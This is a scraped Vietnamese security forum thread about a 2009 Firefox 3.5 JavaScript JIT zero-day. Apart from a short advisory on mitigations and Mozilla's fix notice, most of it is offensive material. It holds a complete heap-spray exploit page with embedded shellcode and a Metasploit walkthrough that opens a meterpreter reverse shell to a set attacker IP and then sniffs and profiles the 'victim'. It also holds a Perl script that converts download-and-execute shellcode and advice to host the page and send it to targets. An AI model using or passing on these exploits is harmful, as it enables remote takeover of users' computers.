<![CDATA[Latest posts for the topic "0-day in Mozilla Firefox 3.5 - critical"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net 0-day in Mozilla Firefox 3.5 - critical http://www.us-cert.gov/current/index.html#mozilla_firefox_3_5_vulnerability, Javascript engine của FF 3.5 hiện có thể bị khai thác thực thi mã độc khi người sử dụng mở trang web có nhúng mã khai thác. Đoạn mã khai thác đã được phát tán rộng rãi trên internet. Giải pháp hiện tại: Tắt tính năng Javascript hoặc làm theo hướng dẫn của US-CERT tại http://www.us-cert.gov/reading_room/securing_browser/#Mozilla_Firefox. Bổ sung: Có hai biện pháp giải quyết tạm thời - Dùng addons NoScript của Firefox hoặc - Tắt chức năng JIT của Javascript: trong about:config, đặt [color="red"]javascript.options.jit.content= false[/color] Sẽ có FF 3.5.1 trong tháng này nhằm vá lỗi của javascript và http://blog.internetnews.com/skerner/2009/07/firefox-35-at-risk-from-0day-j.html của FF 3.5. --- Sửa đổi bổ sung phần giải pháp tạm thời]]> /hvaonline/posts/list/30245.html#186333 /hvaonline/posts/list/30245.html#186333 GMT 0-day in Mozilla Firefox 3.5 - critical /hvaonline/posts/list/30245.html#186335 /hvaonline/posts/list/30245.html#186335 GMT 0-day in Mozilla Firefox 3.5 - critical Code:
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                             
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +   
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +   
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +   
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-13]
các bác update metasploit về để hack nhé video khai thác lỗi: http://www.youtube.com/watch?v=G_lNIByYXxE ]]> /hvaonline/posts/list/30245.html#186341 /hvaonline/posts/list/30245.html#186341 GMT 0-day in Mozilla Firefox 3.5 - critical /hvaonline/posts/list/30245.html#186350 /hvaonline/posts/list/30245.html#186350 GMT 0-day in Mozilla Firefox 3.5 - critical /hvaonline/posts/list/30245.html#186363 /hvaonline/posts/list/30245.html#186363 GMT 0-day in Mozilla Firefox 3.5 - critical http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/multi/browser/firefox_escape_retval.rb hướng dẫn add http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html hoặc ở đây: /hvaonline/posts/list/21868.html]]> /hvaonline/posts/list/30245.html#186375 /hvaonline/posts/list/30245.html#186375 GMT 0-day in Mozilla Firefox 3.5 - critical msf > use exploit/multi/browser/firefox_escape_retval msf exploit(firefox_escape_retval) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp  
msf exploit(firefox_escape_retval) > show options 
Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Use SSL URIPATH no The URI to use for this exploit (default is random) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The local address LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Firefox 3.5.0 on Windows XP SP0-SP3 
SRVPORT hiện là 8080, thay đổi lại thành 80 cho dễ dùng, và set url Path luôn nha :
msf exploit(firefox_escape_retval) > set SRVPORT 80 SRVPORT => 80 msf exploit(firefox_escape_retval) > set URIPATH index.html URIPATH => index.html 
Nhớ set lại IP để reverse về nhé :
msf exploit(firefox_escape_retval) > set LHOST 203.162.11.12 LHOST => 203.162.11.12  
Lúc này server sẽ lắng nghe ở port 4444, nếu cần thì thay đổi lại cho phù hợp. bắt đầu run exploit
msf exploit(firefox_escape_retval) > exploit 
[*] Exploit running as background job. msf exploit(firefox_escape_retval) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using url: http://0.0.0.0:80/index.html [*] Local IP: http://203.162.11.12:80/index.html [*] Server started. 
Sau khi victim run address xong, ta có được shell rồi, tiếp theo interaction vào session để có shell
msf exploit(firefox_escape_retval) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ipconfig 
.................. làm gì nữa thì tùy nha, tuy nhiên nếu firefox cash hoặc victim đóng lại thì mất shell, vì thế khi có shell rồi tranh thủ nhanh tay làm cái gì đó thì làm nha :D ]]> /hvaonline/posts/list/30245.html#186405 /hvaonline/posts/list/30245.html#186405 GMT 0-day in Mozilla Firefox 3.5 - critical Code:
meterpreter > help

…….

Sniffer Commands

================

 

    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data

    sniffer_interfaces  list all remote sniffable interfaces

    sniffer_start       Capture packets on a previously opened interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )

meterpreter >
hoặc biết thêm thông tin gì đó về victim: Code:
meterpreter > sysinfo

Computer: victim

OS      : Windows XP (Build 2600, Service Pack 2).

meterpreter >
chúc các bác thành công :D ]]> /hvaonline/posts/list/30245.html#186413 /hvaonline/posts/list/30245.html#186413 GMT 0-day in Mozilla Firefox 3.5 - critical Code:
0038695C            83E1 F8                    AND ECX,FFFFFFF8
0038695F            8B11                       MOV EDX,DWORD PTR DS:[ECX]
00386961            8B02                       MOV EAX,DWORD PTR DS:[EDX]  ; <-- EAX bị sửa đổi ở đây
00386963            83C3 FC                    ADD EBX,-4
00386966            53                         PUSH EBX
00386967            6A 00                      PUSH 0
00386969            51                         PUSH ECX
0038696A            8B48 20                    MOV ECX,DWORD PTR DS:[EAX+20] ; <-- Dùng kỹ thuật heap spray để chèn đoạn padding & shellcode vào vùng bộ nhớ eax + 20.
0038696D            57                         PUSH EDI
0038696E            FFD1                       CALL ECX         ; <-- Shellcode được gọi từ đây
]]> /hvaonline/posts/list/30245.html#186448 /hvaonline/posts/list/30245.html#186448 GMT 0-day in Mozilla Firefox 3.5 - critical

mfeng wrote:
Một số phân tích kĩ thuật thêm về bug này: Lỗi này nằm tại file js3250.dll. Đoạn mã khai thác lỗi cho phép điều khiển giá trị eax và ecx tại đoạn lệnh sau Code:
0038695C            83E1 F8                    AND ECX,FFFFFFF8
0038695F            8B11                       MOV EDX,DWORD PTR DS:[ECX]
00386961            8B02                       MOV EAX,DWORD PTR DS:[EDX]  ; <-- EAX bị sửa đổi ở đây
00386963            83C3 FC                    ADD EBX,-4
00386966            53                         PUSH EBX
00386967            6A 00                      PUSH 0
00386969            51                         PUSH ECX
0038696A            8B48 20                    MOV ECX,DWORD PTR DS:[EAX+20] ; <-- Dùng kỹ thuật heap spray để chèn đoạn padding & shellcode vào vùng bộ nhớ eax + 20.
0038696D            57                         PUSH EDI
0038696E            FFD1                      [color=yellow] CALL ECX[/color]         ; <-- Shellcode được gọi từ đây
 
Nó call ECX trực tiếp vậy hèn chi đọc đoạn shellcode của cái code PoC trên milw0rm, mình thấy nó ko thèm encode shellcode gì hết, NULL byte từa lưa Thanks mfeng]]> /hvaonline/posts/list/30245.html#186487 /hvaonline/posts/list/30245.html#186487 GMT 0-day in Mozilla Firefox 3.5 - critical /hvaonline/posts/list/30245.html#186499 /hvaonline/posts/list/30245.html#186499 GMT 0-day in Mozilla Firefox 3.5 - critical /hvaonline/posts/list/30245.html#186500 /hvaonline/posts/list/30245.html#186500 GMT 0-day in Mozilla Firefox 3.5 - critical Impact key: * Critical: Vulnerability can be used to run attacker code and install software, requiring no user interaction beyond normal browsing. * High: Vulnerability can be used to gather sensitive data from sites in other windows or inject data or code into those sites, requiring no more than normal browsing actions. * Moderate: Vulnerabilities that would otherwise be High or Critical except they only work in uncommon non-default configurations or require the user to perform complicated and/or unlikely steps. * Low: Minor security vulnerabilities such as Denial of Service attacks, minor data leaks, or spoofs. (Undetectable spoofs of SSL indicia would have "High" impact because those are generally used to steal sensitive data intended for other sites.) Fixed in Firefox 3.5.1 MFSA 2009-41 Corrupt JIT state after deep return from native function   http://www.mozilla.org/security/known-vulnerabilities/firefox35.html#firefox3.5.1]]> /hvaonline/posts/list/30245.html#186656 /hvaonline/posts/list/30245.html#186656 GMT 0-day in Mozilla Firefox 3.5 - critical # Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode Code:
#!/usr/bin/perl

use strict;

# Win32 Download & Execute Shellcode / Translating shellcode To JScript shellcode

# coded by elazer (elazarb [at] earthlink.net)


# linux Usage:
# bt shellcode # ./jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# windows Usage:
# C:\Documents and Settings\elazer\Desktop>jscript.pl %uc933%ue983%ud9b8%ud9ee%u2474%u5bf4%u7381%u1713%uc161%u8392%ufceb%uf4e2%u0beb%udf2a%u98ff%u6d3e%u01e8%ufe4a%u4533%ud74a%uea2b%u97bd%u606f%u192e%u7958%ucd4a%u6037%udb2a%u559c%u934a%u50f9%u0b01%ue5bb%ue601%ua010%u9f0b%ua316%u662a%u352c%ubae5%u8462%ucd4a%u6033%uf42a%u6d9c%u198a%u7d48%u79c0%u4d14%u1b4a%u457b%uf3dd%u50d4%uf61a%u229c%u19f1%u6d57%ue24a%ucc0b%ud24a%u3f1f%u1ca9%u6f59%uc22d%ub7e8%uc1a7%u0971%ua0f2%u167f%ua0b2%u3548%u423e%uaa7f%u6e2c%u312c%u443e%ue848%uf424%u8c96%u90c9%u0b42%u6dc3%u09c7%u9b18%ucce2%u6d96%u32c1%uc192%u2244%ud192%u9e44%ufa11%uc9d7%ud1c0%u0971%u3cc9%u3271%u7348%u0982%u6b2d%u01bd%u6d96%u0bc1%uc3d1%u9e42%uf411%u057d%ufaa7%u0c74%uc2ab%u484e%u1b0d%u0bf0%u1b85%u50f5%u6101%uf4bd%u6f48%u23e9%u6cec%u4d55%ue84c%uca2f%u396a%u137f%u213f%u9e01%ubab4%ub7e8%uc59a%u3045%uc390%u607d%uc390%u3042%u423e%ucc7f%u9718%u32d9%u443e%u9e7d%ua53e%ub1e8%u75a9%ua76e%u6db8%u6562%u443e%u16e8%u6d3d%u09c7%u1831%u3e13%u6d92%u9ec1%u9211

# your shellcode here
my $shellcode =
"\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdf".
"\xfa\xe2\x72\x83\xeb\xfc\xe2\xf4\x23\x90\x09\x3f\x37\x03\x1d\x8d".
"\x20\x9a\x69\x1e\xfb\xde\x69\x37\xe3\x71\x9e\x77\xa7\xfb\x0d\xf9".
"\x90\xe2\x69\x2d\xff\xfb\x09\x3b\x54\xce\x69\x73\x31\xcb\x22\xeb".
"\x73\x7e\x22\x06\xd8\x3b\x28\x7f\xde\x38\x09\x86\xe4\xae\xc6\x5a".
"\xaa\x1f\x69\x2d\xfb\xfb\x09\x14\x54\xf6\xa9\xf9\x80\xe6\xe3\x99".
"\xdc\xd6\x69\xfb\xb3\xde\xfe\x13\x1c\xcb\x39\x16\x54\xb9\xd2\xf9".
"\x9f\xf6\x69\x02\xc3\x57\x69\x32\xd7\xa4\x8a\xfc\x91\xf4\x0e\x22".
"\x20\x2c\x84\x21\xb9\x92\xd1\x40\xb7\x8d\x91\x40\x80\xae\x1d\xa2".
"\xb7\x31\x0f\x8e\xe4\xaa\x1d\xa4\x80\x73\x07\x14\x5e\x17\xea\x70".
"\x8a\x90\xe0\x8d\x0f\x92\x3b\x7b\x2a\x57\xb5\x8d\x09\xa9\xb1\x21".
"\x8c\xb9\xb1\x31\x8c\x05\x32\x1a\x1f\x52\xe0\x17\xb9\x92\xea\x3b".
"\xb9\xa9\x6b\x93\x4a\x92\x0e\x8b\x75\x9a\xb5\x8d\x09\x90\xf2\x23".
"\x8a\x05\x32\x14\xb5\x9e\x84\x1a\xbc\x97\x88\x22\x86\xd3\x2e\xfb".
"\x38\x90\xa6\xfb\x3d\xcb\x22\x81\x75\x6f\x6b\x8f\x21\xb8\xcf\x8c".
"\x9d\xd6\x6f\x08\xe7\x51\x49\xd9\xb7\x88\x1c\xc1\xc9\x05\x97\x5a".
"\x20\x2c\xb9\x25\x8d\xab\xb3\x23\xb5\xfb\xb3\x23\x8a\xab\x1d\xa2".
"\xb7\x57\x3b\x77\x11\xa9\x1d\xa4\xb5\x05\x1d\x45\x20\x2a\x8a\x95".
"\xa6\x3c\x9b\x8d\xaa\xfe\x1d\xa4\x20\x8d\x1e\x8d\x0f\x92\x12\xf8".
"\xdb\xa5\xb1\x8d\x09\x05\x32\x72";





my $jscript =convert_shellcode($shellcode);
buffer_gen($shellcode);
print $jscript;

sub generate_char()
{
 my $wdsize = shift;
 my @alphanumeric = ('a'..'z');
 my $wd = join '',
 map $alphanumeric[rand @alphanumeric], 0..$wdsize;
  return $wd;
}

sub convert_shellcode {
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        my $idx = 0;

        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx < length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}

sub buffer_gen(){

}
sau đó changing shellcode, upload file .html lên host,rồi send cho victim ]]> /hvaonline/posts/list/30245.html#186971 /hvaonline/posts/list/30245.html#186971 GMT 0-day in Mozilla Firefox 3.5 - critical

tientan.infotech wrote:
Của tui up len 3.5.2 ròi.mà chưa từng thử hack.Có bro nào dạy mình hem nhỉ ? 
demo: http://www.youtube.com/watch?v=G_lNIByYXxE]]> /hvaonline/posts/list/30245.html#188681 /hvaonline/posts/list/30245.html#188681 GMT